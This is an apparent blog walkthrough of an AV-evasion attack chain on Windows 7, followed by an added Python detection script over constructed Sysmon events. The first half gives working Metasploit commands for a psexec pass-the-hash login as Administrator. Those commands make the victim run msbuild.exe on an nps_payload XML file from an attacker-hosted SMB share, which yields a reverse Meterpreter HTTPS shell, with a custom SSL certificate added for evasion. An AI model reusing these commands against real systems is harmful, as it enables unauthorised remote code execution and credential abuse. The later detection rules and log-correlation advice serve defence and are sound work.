PsExec Pass-the-Hash + NPS_Payload = Evasion

Sources and many thanks to:

@subTee – Bypassing Application Whitelisting using MSBuild.exe – Device Guard Example and Mitigations
http://subt0x10.blogspot.com/2017/04/bypassing-application-whitelisting.html

@spoonman1091 & @ben0xa – NPS_Payload
https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/

Attack Video: https://youtu.be/5WQcB6L56QQ

Demo Systems:
Victim Machine – Windows 7 Professional (x86) with Norton Security AV
Attack Machine – Kali Rolling 2017.1

Attack Methodology:
1. Build the XML file for msbuild.exe using nps_payload.
This XML file will contain my PowerShell (PSH) reverse Meterpreter HTTPS payload.

2. Check the Samba config file, and start the smbd service.

3. Copy the XML file to the local share directory.

4. Modify the Metasploit RC file to include a custom SSL cert for additional evasion.

set HandlerSSLCert /root/.msf4/loot/file.pem
set StagerVerifySSLCert true

5. Modify the Metasploit RC file to include the psexec+pth attack.
The windows/exec payload runs the msbuild.exe command line generated by nps_payload.

use exploit/windows/smb/psexec
set rhost IPADDRESS
set smbuser Administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:HASH

set payload windows/exec
set cmd cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\192.168.222.198\\payloads$\\msbuild_nps.xml

6. Execute the Metasploit RC file, and gain pwnage.
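From the defender's side, the chain above leaves two telemetry artifacts that AV signatures on the payload itself do not cover: a command line that points msbuild.exe at a project file on a UNC share, and an msbuild.exe process whose ancestry leads back to a service started through the Service Control Manager (the PsExec-style launch). The script below is an added example, not code from the original post or from nps_payload; it runs detection logic over constructed Sysmon Event ID 1 (ProcessCreate) records. Assumptions: field names mirror Sysmon's (ProcessId, ParentProcessId, Image, CommandLine), the randomly named service binary `hJkQwErT.exe` is hypothetical, and the sample uses the share and IP from the RC file above purely as constructed data.

```python
"""Added detection example (not from the original post): flag MSBuild-based
payload execution and its PsExec-style launch chain in Sysmon Event ID 1
(ProcessCreate) records.  All events below are constructed samples; real
telemetry should be keyed on ProcessGuid rather than reusable PIDs."""
import re
from typing import Dict, List

Event = Dict[str, str]

# Constructed sample events (not real telemetry). Field names follow Sysmon EID 1.
EVENTS: List[Event] = [
    {"ProcessId": "500", "ParentProcessId": "400",
     "Image": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\services.exe"},
    # Hypothetical randomly named service binary written to ADMIN$ by a PsExec-style tool
    {"ProcessId": "1200", "ParentProcessId": "500",
     "Image": r"C:\Windows\hJkQwErT.exe", "CommandLine": r"C:\Windows\hJkQwErT.exe"},
    {"ProcessId": "1300", "ParentProcessId": "1200",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\192.168.222.198\payloads$\msbuild_nps.xml"},
    {"ProcessId": "1400", "ParentProcessId": "1300",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\192.168.222.198\payloads$\msbuild_nps.xml"},
    # Benign: a developer builds a local project from Visual Studio
    {"ProcessId": "2000", "ParentProcessId": "900",
     "Image": r"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\Common7\IDE\devenv.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\Common7\IDE\devenv.exe"'},
    {"ProcessId": "2100", "ParentProcessId": "2000",
     "Image": r"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
]

UNC_PATH = re.compile(r'\\\\[A-Za-z0-9._-]+\\[^\s"]+')  # \\host\share\... as it appears on the command line
SERVICE_HOSTS = {"services.exe", "psexesvc.exe"}        # ancestors that indicate a service-based launch


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events: List[Event], pid: str, max_depth: int = 16) -> List[str]:
    """Image basenames of a process's ancestors, nearest parent first."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain: List[str] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur and cur["ParentProcessId"] in by_pid and len(chain) < max_depth:
        parent = by_pid[cur["ParentProcessId"]]
        if parent["ProcessId"] in seen:  # guard against PID-reuse loops in messy telemetry
            break
        seen.add(parent["ProcessId"])
        chain.append(basename(parent["Image"]))
        cur = parent
    return chain


def analyze(events: List[Event]) -> Dict[str, List[str]]:
    """Map ProcessId -> reasons the event is suspicious; unflagged processes are absent."""
    findings: Dict[str, List[str]] = {}
    for e in events:
        reasons: List[str] = []
        cmd = e["CommandLine"]
        # Rule A: any process whose command line invokes msbuild against a UNC-hosted project
        if "msbuild" in cmd.lower() and UNC_PATH.search(cmd):
            reasons.append("msbuild invoked with a project file on a UNC path")
        # Rule B: msbuild.exe itself running with a service host in its ancestry (remote service exec)
        if basename(e["Image"]) == "msbuild.exe":
            anc = ancestry(events, e["ProcessId"])
            if SERVICE_HOSTS & set(anc):
                reasons.append("msbuild.exe descends from a service process: " + " <- ".join(anc))
        if reasons:
            findings[e["ProcessId"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in analyze(EVENTS).items():
        print(pid, *reasons, sep="\n    ")
```

Rule A fires on both the cmd.exe launcher and the msbuild.exe child; rule B fires only on msbuild.exe because its parent chain runs through the dropped service binary back to services.exe, while the Visual Studio build (local .csproj, devenv.exe parent) is left alone. To tighten this in production, correlate the flagged host with a System log 7045 (service installed) event and a Security 4624 type 3 NTLM logon from the same source at the same time, which is the footprint the psexec+pth step leaves regardless of what the payload does.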